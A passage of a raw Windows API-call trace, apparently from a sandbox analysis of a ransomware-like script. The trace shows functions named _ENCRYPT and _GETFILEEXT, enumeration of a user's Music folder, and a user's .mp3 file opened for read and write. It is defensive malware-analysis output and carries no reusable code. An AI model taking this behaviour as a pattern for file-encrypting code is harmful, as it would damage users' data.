(in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0037.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.872] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0037.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0037.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0037.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0037.873] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0037.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0037.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0037.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0037.873] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0037.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0037.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0037.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889910 [0037.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889910, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0037.873] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.873] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0037.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0037.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.873] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0037.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0037.873] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.873] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0037.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0037.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0037.873] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ni", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ini", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ini", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.874] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 0x7c20c0 [0037.874] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0037.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0037.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0037.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0037.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0037.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0037.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0037.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0037.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0037.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0037.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0037.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0037.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0037.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0037.875] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 0x7c20c0 [0037.875] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0037.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0037.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0037.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0037.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0037.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0037.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0037.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0037.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0037.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.875] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0037.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0037.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af3f8 [0037.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0037.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0037.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0037.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0037.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0037.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c9b8 [0037.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0037.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0037.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0037.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0037.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0037.876] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0037.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0037.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0037.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0037.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0037.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0037.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0037.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0037.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0037.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0037.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0037.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0037.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0037.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0037.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0037.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0037.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0037.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0037.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0037.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0037.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0037.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0037.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0037.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0037.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0037.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0037.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0037.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0037.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0037.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0037.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0037.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0037.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0037.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0037.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0037.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0037.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0037.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0037.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0037.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0037.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0037.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0037.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0037.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0037.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0037.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0037.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0037.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0037.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0037.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0037.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0037.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0037.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0037.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0037.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0037.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0037.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0037.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0037.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0037.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0037.878] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0037.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0037.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0037.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889ac0 [0037.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889ac0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0037.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0037.879] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0037.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0037.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0037.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0037.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0037.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0037.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0037.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0037.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889ac0 [0037.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x889ac0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0037.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0037.879] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0037.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0037.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0037.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0037.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0037.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0037.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0037.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0037.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0037.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0037.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0037.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0037.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xaa0008 [0037.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\f5eSIWN.mp3", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0037.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0037.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\f5eSIWN.mp3", cchWideChar=48, lpMultiByteStr=0x7b45c8, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\f5eSIWN.mp3", lpUsedDefaultChar=0x0) returned 48 [0037.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0037.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0037.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0037.880] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\f5eSIWN.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\f5esiwn.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0037.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0037.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0037.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0037.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0037.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0037.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 